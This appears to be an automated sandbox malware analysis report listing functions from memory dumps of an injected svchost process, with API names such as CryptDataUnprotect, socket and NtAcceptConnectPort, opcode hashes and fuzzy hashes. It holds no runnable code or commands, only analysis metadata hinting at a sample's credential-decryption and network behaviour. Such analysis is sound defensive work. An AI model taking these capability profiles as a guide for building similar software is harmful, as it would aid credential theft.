                                                                                                                • API ID: AcceptCloseConnectHandlePort
                                                                                                                • String ID:
                                                                                                                • API String ID: 3811980168-0
                                                                                                                • Opcode ID: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                • Instruction ID: 2e2e4517e6d0dc0f5b6dd84e3ca2f435640281b52b60a29dd8598c1219e76b10
                                                                                                                • Opcode Fuzzy Hash: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                • Instruction Fuzzy Hash: AC91F630A48F088FDBA4EF18C5457E573E5FB85320F15466ED59BC329AEA34E8C28791
                                                                                                                Function 00007DF45263D42C Relevance: 1.8, APIs: 1, Instructions: 552COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: 0cba3b52d22fc22b11fda789372843ae04e2053c3aa275865dfb441ab6df4247
                                                                                                                • Instruction ID: a289c14fc81c2a04fb2735743d8926ca2ee30bb3679bbfd44e2c7d4f406252b3
                                                                                                                • Opcode Fuzzy Hash: 0cba3b52d22fc22b11fda789372843ae04e2053c3aa275865dfb441ab6df4247
                                                                                                                • Instruction Fuzzy Hash: 47020E31A1CA484BE765FB18D855A9FB7E1FBA4300F50452BE84FC3395DE34AA45CB82
                                                                                                                Function 00007DF4526260F0 Relevance: 1.6, APIs: 1, Instructions: 114encryptionCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CryptDataUnprotect
                                                                                                                • String ID:
                                                                                                                • API String ID: 834300711-0
                                                                                                                • Opcode ID: 856649e5fd06967893b9de20f468b6bbeb41857baffe77d0d88ed87af2e6e484
                                                                                                                • Instruction ID: 042d3c516c14faa88aa5d43fbb0023d5c2df03a885f6ce3349580f439182d385
                                                                                                                • Opcode Fuzzy Hash: 856649e5fd06967893b9de20f468b6bbeb41857baffe77d0d88ed87af2e6e484
                                                                                                                • Instruction Fuzzy Hash: 37316030B1CA484FE748EB6CD85966EB7E1EB98341F40456FF84BC3391EA78E9418752
                                                                                                                Function 0000024F6A2A15C0 Relevance: 1.6, APIs: 1, Instructions: 76nativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,00000000,0000024F6A2A1E3A), ref: 0000024F6A2A1654
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2458604547.0000024F6A2A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024F6A2A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_24f6a2a0000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                • Instruction ID: 212be6e950e5f2962cf6dc493cd9d55c1f119ed8cb29c6806d4fc6ace7ca6e61
                                                                                                                • Opcode Fuzzy Hash: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                • Instruction Fuzzy Hash: 18218471A08B048FDB94DF18C5C9665B7E5FBA9305F040A3EE55AC7250E730D4C4CB41
                                                                                                                Function 00007DF45262E25C Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: 4cf3975fe2f826ffe67f273e2a1973cf5c2994fe7bf33f6883edfc4130774661
                                                                                                                • Instruction ID: 0bdefb35fcce8a001297491dd30f8c7778b705157f95b0cbf8e1cad638328feb
                                                                                                                • Opcode Fuzzy Hash: 4cf3975fe2f826ffe67f273e2a1973cf5c2994fe7bf33f6883edfc4130774661
                                                                                                                • Instruction Fuzzy Hash: C0F0BD30A1CB848FDB64EB2CD4C9B5977E1FBA8300F50451AE84DC3345DA34E8808B86
                                                                                                                Function 00007DF45262E094 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: 04777103404d42a3d8809544d07e3f94752c09d4e382fb2d5f2ce09ccce6d52b
                                                                                                                • Instruction ID: 9cd003fd32012a821885293a29d19705db05d83589320b944a4929393377569d
                                                                                                                • Opcode Fuzzy Hash: 04777103404d42a3d8809544d07e3f94752c09d4e382fb2d5f2ce09ccce6d52b
                                                                                                                • Instruction Fuzzy Hash: 85F0AF34A1C7C48FD7A0EB288484B9ABBE0BB9A340F54492AE8CCC3311D735A5848B03
                                                                                                                Function 00007DF45262E3E8 Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: 5596204144bf6387c6881bf1fa4f57717ef6e785025276df84d2fa40d30d7839
                                                                                                                • Instruction ID: b0b8c5707791ee07420e30992857c572e282bed55bd98fb4afa8c5f7c6b09460
                                                                                                                • Opcode Fuzzy Hash: 5596204144bf6387c6881bf1fa4f57717ef6e785025276df84d2fa40d30d7839
                                                                                                                • Instruction Fuzzy Hash: C9E06531618A448FDB04EE98C8C15AEB7E0EBD8300F00497AEC4ACA264D264E698C642
                                                                                                                Function 00007DF45268D66C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetSystemInfo.KERNELBASE(?,00007DF45269EF2F,?,?,?,?,00000000,00000000), ref: 00007DF45268D689
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 31276548-0
                                                                                                                • Opcode ID: 0c8b29b2e46d8ecbda91bf3fbd1e3dce5dd76455cbfab89285b4f133e11fa366
                                                                                                                • Instruction ID: 362e8cf2a1eb8fd78b6fc6dd960910e19d95564b3569149eeb81a080d650129c
                                                                                                                • Opcode Fuzzy Hash: 0c8b29b2e46d8ecbda91bf3fbd1e3dce5dd76455cbfab89285b4f133e11fa366
                                                                                                                • Instruction Fuzzy Hash: 4BE04F31A1480887F34DF731ED994EB7361FBA6300F844663DC07812E6EE2DA35ACA81
                                                                                                                Function 00007DF45262E170 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: c0f707815c29bc5e42aa1d0e63f012e02fb8cc729e2b5fa34e6064e28ee2c0b2
                                                                                                                • Instruction ID: f3e22cf31afcf451fdafa3ec5f04a910e287425a6f2b98a1ddf2b3a4743a6db0
                                                                                                                • Opcode Fuzzy Hash: c0f707815c29bc5e42aa1d0e63f012e02fb8cc729e2b5fa34e6064e28ee2c0b2
                                                                                                                • Instruction Fuzzy Hash: 69D05E30E28A994BDA14F728884561E37E1FB99344F908635DC4DC3300E23CE5808782
                                                                                                                Function 00007DF45262E150 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,00007DF45262C0F7), ref: 00007DF45262E160
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: af8779bb09c2e78d507a3ecc3102d682b92eeb4da621b6902aa3ae21c98f3f52
                                                                                                                • Instruction ID: 0c6c0ddace7073adf887d86aede945790b7a0e3625d78c8f0f9a4fd34ac66e19
                                                                                                                • Opcode Fuzzy Hash: af8779bb09c2e78d507a3ecc3102d682b92eeb4da621b6902aa3ae21c98f3f52
                                                                                                                • Instruction Fuzzy Hash: 30C08C30E5891B8FE90C72AA4C8930E21A0AB4C310F8000329C0AC2384E80CF6C04392
                                                                                                                Function 00007DF45262E3C8 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: 3ea98e83cefaff0a53491c51114555ceb5585970405d7fffab8276f48ff2d2ab
                                                                                                                • Instruction ID: b722ae3ca086083d25c079fa9295708cc93b1daac33700ff8af382a726b1f157
                                                                                                                • Opcode Fuzzy Hash: 3ea98e83cefaff0a53491c51114555ceb5585970405d7fffab8276f48ff2d2ab
                                                                                                                • Instruction Fuzzy Hash: 25C04C14E29C4A5AEA59B2AA4E8165E21A0AB5D355F850032EC0AC2384E54CFAD487A2
                                                                                                                Function 00007DF452604998 Relevance: 4.9, APIs: 2, Strings: 1, Instructions: 354COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: freemalloc
                                                                                                                • String ID: x
                                                                                                                • API String ID: 3061335427-2363233923
                                                                                                                • Opcode ID: 4a23361acd3c5010fa95a7889096e57418eca08b4db551f685a2055cf61445d8
                                                                                                                • Instruction ID: f670cb63a0afdf72eaa8a95cf52c35e45caa9fbe44efc8d3b6df87b1b80bde49
                                                                                                                • Opcode Fuzzy Hash: 4a23361acd3c5010fa95a7889096e57418eca08b4db551f685a2055cf61445d8
                                                                                                                • Instruction Fuzzy Hash: BDB15331A1CA844AE779B71894956EFB7E1FF94300F50056FE8CBC2386DD38E606D686
                                                                                                                Function 00007DF4526FE854 Relevance: 4.7, APIs: 2, Strings: 1, Instructions: 247COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc
                                                                                                                • String ID: X
                                                                                                                • API String ID: 2803490479-3081909835
                                                                                                                • Opcode ID: 54adf88660b01f72c36151e31c36d8d530975ba1749bbb41913897417559b320
                                                                                                                • Instruction ID: 62dc4200f9992d47f94838fe5f59e1d0fb1410627b1aa757fab6637d8a84135d
                                                                                                                • Opcode Fuzzy Hash: 54adf88660b01f72c36151e31c36d8d530975ba1749bbb41913897417559b320
                                                                                                                • Instruction Fuzzy Hash: FF717E70918B488FDB68EF28C4851AA77E5FB49311F10162FDC9BC3796E734E5468B81
                                                                                                                Function 0000024F6A3B33B0 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 350memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2075348566.0000024F6A3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024F6A3B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_24f6a3b0000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID: x
                                                                                                                • API String ID: 3298025750-2363233923
                                                                                                                • Opcode ID: 66731f1b482563bc89d9877d94cc40398e3a5f4cddffed67c8b36e4cd925d657
                                                                                                                • Instruction ID: e250c65a2cfaaa7b930499a43198fdf295bf52318a29579a3c2e697b1e05a298
                                                                                                                • Opcode Fuzzy Hash: 66731f1b482563bc89d9877d94cc40398e3a5f4cddffed67c8b36e4cd925d657
                                                                                                                • Instruction Fuzzy Hash: FAB11B31A18B680BD76D9A2C848B6B9B7D6FBE7300F11057DD4E7C3583ED31D9868681
                                                                                                                Function 00007DF45261A0AC Relevance: 3.4, APIs: 2, Instructions: 397COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile$AcceptConnectMappingPortcalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2835849967-0
                                                                                                                • Opcode ID: 2a318457211b092fa66bf8b2973391630cb524d3b6c5d734c1c63d700200efc5
                                                                                                                • Instruction ID: 8fde8869b9dcfa9971dd386dfde7b96006c0543d10b809cc7998e6641d0f30c9
                                                                                                                • Opcode Fuzzy Hash: 2a318457211b092fa66bf8b2973391630cb524d3b6c5d734c1c63d700200efc5
                                                                                                                • Instruction Fuzzy Hash: 66D1317161CB898BD765EF24D4856ABB7E0FB94700F14462FE88FD2291EB34A505CB82
                                                                                                                Function 00007DF45263128C Relevance: 3.2, APIs: 2, Instructions: 238fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CreateReadmalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 3950102678-0
                                                                                                                • Opcode ID: 8175896fcb390573fe24891a245c90aa42f7386ef66d6d03b2c37bfbfb92b4ab
                                                                                                                • Instruction ID: adea34a7a282190933e7d4c960625d8f2fe4834965166024c7d419c730dff58e
                                                                                                                • Opcode Fuzzy Hash: 8175896fcb390573fe24891a245c90aa42f7386ef66d6d03b2c37bfbfb92b4ab
                                                                                                                • Instruction Fuzzy Hash: 2471647161CA844FE758AF5894C536FB6E1FBA8311F50093FED8FC3392DA3499468642
                                                                                                                Function 00007DF452619F24 Relevance: 3.2, APIs: 2, Instructions: 163fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CreateRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 3388366904-0
                                                                                                                • Opcode ID: c78e9145d2b58ff95487b29f54b2ad6a864e77d3b5d2f7d4ec89dfbd1d437d0c
                                                                                                                • Instruction ID: 5c208010f6192e2ad368e708f7d9a9333efbeb35804a8717703579a502d0631a
                                                                                                                • Opcode Fuzzy Hash: c78e9145d2b58ff95487b29f54b2ad6a864e77d3b5d2f7d4ec89dfbd1d437d0c
                                                                                                                • Instruction Fuzzy Hash: 9F41967160C7884FDB58EB28988566E77E5FB99745F10052FEC4BD3391EA34EA018782
                                                                                                                Function 00007DF452658194 Relevance: 3.1, APIs: 2, Instructions: 139COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Completion$CreateFileModesNotificationPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 3755109111-0
                                                                                                                • Opcode ID: 7a1967616059b3e6c90ec46054d4157d5f1fa80a14d9bea4bf5b0a22eb7d1503
                                                                                                                • Instruction ID: df7571dcbbb7411b0b52231c86cb3f13190eb772e8a8d420e3c9d29683c26adb
                                                                                                                • Opcode Fuzzy Hash: 7a1967616059b3e6c90ec46054d4157d5f1fa80a14d9bea4bf5b0a22eb7d1503
                                                                                                                • Instruction Fuzzy Hash: E041C330718E458FE758AB28989867E7BE5FB59311F90013BEC4BC2791DB38DE418786
                                                                                                                Function 00007DF452659488 Relevance: 3.1, APIs: 2, Instructions: 117COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Completion$CreateFileModesNotificationPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 3755109111-0
                                                                                                                • Opcode ID: a0188f15f0f55639413b935e0f9e52b5b67f8cb31f9b30338d0719667cf6a9eb
                                                                                                                • Instruction ID: 6dcf400ce93f2a9fce7876d9475e34b17ef51588fff16bfbd1cdbb69c5c833dd
                                                                                                                • Opcode Fuzzy Hash: a0188f15f0f55639413b935e0f9e52b5b67f8cb31f9b30338d0719667cf6a9eb
                                                                                                                • Instruction Fuzzy Hash: DE3192307099964FFB94AB2898C462E33E5EB65315F90007BDC4FC2392EB29DD51CAD6
                                                                                                                Function 00007DF452630E5C Relevance: 3.1, APIs: 2, Instructions: 101fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CreateRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 3388366904-0
                                                                                                                • Opcode ID: b6bf591d6850f71c9b943434f57521467a92e42e2958a71744576a35db589d24
                                                                                                                • Instruction ID: 3adb75ed1670b3a06ee99b24f6d7750ca4396a82e4cfbc78682fed4d2644dc71
                                                                                                                • Opcode Fuzzy Hash: b6bf591d6850f71c9b943434f57521467a92e42e2958a71744576a35db589d24
                                                                                                                • Instruction Fuzzy Hash: E021B77170C7444BE754AA5C68C627F73D4EBA9710F10012FED8FC3342DA65A9074682
                                                                                                                Function 00007DF45262A38C Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Initializefree
                                                                                                                • String ID:
                                                                                                                • API String ID: 1505762977-0
                                                                                                                • Opcode ID: d784aff8455e90a792f5bb0301558f13da35dbf6ced70a9076be41ee9bcd0a5a
                                                                                                                • Instruction ID: 890f012d567e77b016395c8fbd0473e6bb9f49360a155c1c4994e4ff9424f4cb
                                                                                                                • Opcode Fuzzy Hash: d784aff8455e90a792f5bb0301558f13da35dbf6ced70a9076be41ee9bcd0a5a
                                                                                                                • Instruction Fuzzy Hash: D5213331608A488FDF94FF28D845A9E77E1FF94315F00462ABC4ED3291DA35E941CB91
                                                                                                                Function 0000024F6A3B30C7 Relevance: 1.9, APIs: 1, Instructions: 390memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2075348566.0000024F6A3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024F6A3B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_24f6a3b0000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                • Opcode ID: 303b8c0989242cf92ca0cd4d783777a294e129bb4baa6511c2b5450d342b2a2a
                                                                                                                • Instruction ID: aa4f4d738dfd30abee691f9ba9f16b61c538935582836d4967b8ec3b7ac4f81d
                                                                                                                • Opcode Fuzzy Hash: 303b8c0989242cf92ca0cd4d783777a294e129bb4baa6511c2b5450d342b2a2a
                                                                                                                • Instruction Fuzzy Hash: E9C1B630618B098FDB98EF1CD489BA9B7E5FBD5310F01452DE49AC7256DB31E885CB82
                                                                                                                Function 00007DF452616984 Relevance: 1.9, APIs: 1, Instructions: 367timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Timer$CreateQueue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3971536239-0
                                                                                                                • Opcode ID: ee08dfc8813552caf415b561b8fe41f73c0806e562454f8f3da524bc4bb5517f
                                                                                                                • Instruction ID: c8df78e19e4087805dfbb780e3d4deb9945d13ae2abb5968c2c54f4932bca3ce
                                                                                                                • Opcode Fuzzy Hash: ee08dfc8813552caf415b561b8fe41f73c0806e562454f8f3da524bc4bb5517f
                                                                                                                • Instruction Fuzzy Hash: A2B18330A1CA488BE765FB68D8496AB73E1FB94311F50462BD84FC2395EF38A542D781
                                                                                                                Function 00007DF452619BA4 Relevance: 1.8, APIs: 1, Instructions: 336COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFileMapping
                                                                                                                • String ID:
                                                                                                                • API String ID: 524692379-0
                                                                                                                • Opcode ID: 9caefa4f03cbde6e91824fcfee4ae40bb1a0a4024421f46cbdb30d76b0c8420d
                                                                                                                • Instruction ID: c64526da2b68cf82c5328df662e0df31f153fcda982b1592c8011173c2a90b7f
                                                                                                                • Opcode Fuzzy Hash: 9caefa4f03cbde6e91824fcfee4ae40bb1a0a4024421f46cbdb30d76b0c8420d
                                                                                                                • Instruction Fuzzy Hash: 78B1207161CA888FE755EF24D4846AEB7E1FB94300F504A2FE88BC7391DA34A545CB81
                                                                                                                Function 00007DF452659A44 Relevance: 1.8, APIs: 1, Instructions: 269networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: socket
                                                                                                                • String ID:
                                                                                                                • API String ID: 98920635-0
                                                                                                                • Opcode ID: 2721ed2ea199d0fbf68231277595e7ec9133ab29ddcf747aa5bb8dccdb3e1387
                                                                                                                • Instruction ID: 2f8bdf42d5319816771c9742c45aec45aee0ba0430f3b9ddb4e5e4dcdca5f956
                                                                                                                • Opcode Fuzzy Hash: 2721ed2ea199d0fbf68231277595e7ec9133ab29ddcf747aa5bb8dccdb3e1387
                                                                                                                • Instruction Fuzzy Hash: B2911F70618E46CFEB94EF28C4C96AA77E0FF15315F90016AEC4BC6691E739E940CB91
                                                                                                                Function 00007DF452602514 Relevance: 1.7, APIs: 1, Instructions: 222COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 31276548-0
                                                                                                                • Opcode ID: 4604594dd80deaa7dc65681505de0cd38ecb63ec40db0f49576e2dc26c5e6384
                                                                                                                • Instruction ID: c81cf8a8693a162be154acd1f9e4dd3a5af8b5db63e1a085429c68e5e41a2b9f
                                                                                                                • Opcode Fuzzy Hash: 4604594dd80deaa7dc65681505de0cd38ecb63ec40db0f49576e2dc26c5e6384
                                                                                                                • Instruction Fuzzy Hash: 6951C33062CE4D4FEB56BB68945836E72E1FF98340F10013BEC4EC3394DAA9ED819681
                                                                                                                Function 00007DF452615870 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InformationVolume
                                                                                                                • String ID:
                                                                                                                • API String ID: 2039140958-0
                                                                                                                • Opcode ID: f9c10d06f27717c523a2b4302f1ad03c132034baba63a38b2d21c1b59cc56e71
                                                                                                                • Instruction ID: 0f10a62a606d3703efbaf0da6d52e4299124fb25652fbeba990def49b4350d11
                                                                                                                • Opcode Fuzzy Hash: f9c10d06f27717c523a2b4302f1ad03c132034baba63a38b2d21c1b59cc56e71
